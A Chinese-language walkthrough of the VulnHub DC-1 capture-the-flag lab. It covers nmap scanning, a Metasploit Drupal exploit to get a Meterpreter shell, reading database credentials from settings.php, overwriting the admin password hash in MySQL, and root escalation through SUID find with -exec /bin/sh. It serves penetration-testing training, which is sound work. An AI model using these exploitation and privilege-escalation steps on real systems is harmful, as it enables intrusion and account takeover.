DC-1 复现

1. 扫描全网段,找到存活主机，ip为192.168.85.140

nmap 192.168.85.0/24

2. 发现有80端口开放，访问以下

3.利用wappalyer看中间件，使用了drupal

4.使用kali搜索drupal的漏洞，并利用

msfconsole                         #打开msf
search drupal                      #搜索和drupal相关的信息

使用第一个exp

use 1
show  options          #查看要配置的参数

这个地方yes是必填项，rport需要改成1898

set rhosts 192.168.85.140      #设置目标ip
run                           #运行

成功获取meterpreter

查看权限

getuid

python -c 'import pty;pty.spawn("/bin/bash")' #使用python创建交换式shell

查看当前目录下的文件,并查看flag1.txt文件

ls
cat flag.txt

flag1.txt意思是所有cms都需要配置文件，你也一样，需要找配置文件

配置文件可能是config之类的或者setting之类的，config没看到重要的文件

find / -name 'conf*'
或者
find / -name 'setting*'

看到settings.php,查看此文件

cat ./sites/default/settings.php

看到flag2.txt，意思是暴力破解和字典攻击不是唯一进入的方法（你需要权限时），你可以尝试那些凭证做什么

发现下方有配置信息，像是mysql

用户名： dbuser
密码： R0ck3t

查看一下端口开放情况

nestat -anlpt

发现3306时开启的，登录mysql

mysql -udbuser -pR0ck3t

查数据库：

show databases;

查数据表：

use drupaldb；
show tables；

发现users，查数据：

select * from users；

不知道什么加密，看一下有没有加密脚本

find / -name 'pass*'

发现脚本，运行一下脚本

./scripts/password-hash.sh 123456
加密后的值和mysql中的很像，加密后的值
$S$DXULlaGXubXoeo0H5wlwzwpN703KiOmeccTsbpbMUFdJ0CqnSucM

不知道为什么进入到scripts目录运行就出错：

再次登录进入到mysql，改密码

mysql -udbuser -pR0ck3t
use drupaldb；
update users set pass='$S$DXULlaGXubXoeo0H5wlwzwpN703KiOmeccTsbpbMUFdJ0CqnSucM' where uid=1；

web界面登录

admin
123456

在登录后找一下flag

flag3.txt意思是特殊的PERMS 将帮助查找passwd——但是您需要-exec 该命令来确定如何获取shadow中的内容。

查看/etc/passwd:

cat /etc/passwd

查看flag4.txt

cat /home/flag4/flag4.txt

意思是可以使用和find相同的方法去获取root目录下的flag

find提权

find . -exec '/bin/sh' \;         #反弹本地

反弹shell生成命令：

[~]#棱角 ::Edge.Forum* (ywhack.com)

参考文章：

vulnhub DC:1渗透笔记 - 听梦外雪花飞 - 博客园 (cnblogs.com)